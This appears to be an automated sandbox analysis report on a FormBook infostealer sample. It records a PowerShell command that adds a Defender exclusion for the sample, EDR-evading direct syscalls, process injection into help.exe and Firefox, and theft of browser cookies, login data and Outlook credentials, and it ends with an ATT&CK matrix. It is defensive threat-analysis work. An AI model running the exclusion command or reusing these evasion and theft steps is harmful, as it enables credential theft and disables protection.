                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtAllocateVirtualMemory: Direct from: 0x77172BFCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtDelayExecution: Direct from: 0x77172DDCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtQuerySystemInformation: Direct from: 0x77172DFCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtReadFile: Direct from: 0x77172ADCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtQueryInformationProcess: Direct from: 0x77172C26Jump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtResumeThread: Direct from: 0x77172FBCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtWriteVirtualMemory: Direct from: 0x7717490CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtCreateUserProcess: Direct from: 0x7717371CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtOpenKeyEx: Direct from: 0x77172B9CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtNotifyChangeKey: Direct from: 0x77173C2CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtSetInformationProcess: Direct from: 0x77172C5CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtProtectVirtualMemory: Direct from: 0x77172F9CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtResumeThread: Direct from: 0x771736ACJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtMapViewOfSection: Direct from: 0x77172D1CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtWriteVirtualMemory: Direct from: 0x77172E3CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtCreateMutant: Direct from: 0x771735CCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtDeviceIoControlFile: Direct from: 0x77172AECJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtAllocateVirtualMemory: Direct from: 0x77172BECJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtTerminateThread: Direct from: 0x77172FCCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtQueryInformationToken: Direct from: 0x77172CACJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtCreateFile: Direct from: 0x77172FECJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtOpenFile: Direct from: 0x77172DCCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtClose: Direct from: 0x77172B6C
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtSetInformationThread: Direct from: 0x771663F9Jump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtAllocateVirtualMemory: Direct from: 0x77173C9CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtQueryAttributesFile: Direct from: 0x77172E6CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtSetInformationThread: Direct from: 0x77172B4CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtReadVirtualMemory: Direct from: 0x77172E8CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtCreateKey: Direct from: 0x77172C6CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtQueryVolumeInformationFile: Direct from: 0x77172F2CJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtAllocateVirtualMemory: Direct from: 0x771748ECJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtQuerySystemInformation: Direct from: 0x771748CCJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeNtOpenSection: Direct from: 0x77172E0CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory written: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: NULL target: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7880Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\help.exeThread APC queued: target process: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"Jump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000000.1345667156.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723382472.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000000.1494776343.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000000.1345667156.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723382472.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000000.1494776343.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000000.1345667156.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723382472.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000000.1494776343.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000000.1345667156.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723382472.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000000.1494776343.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeQueries volume information: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
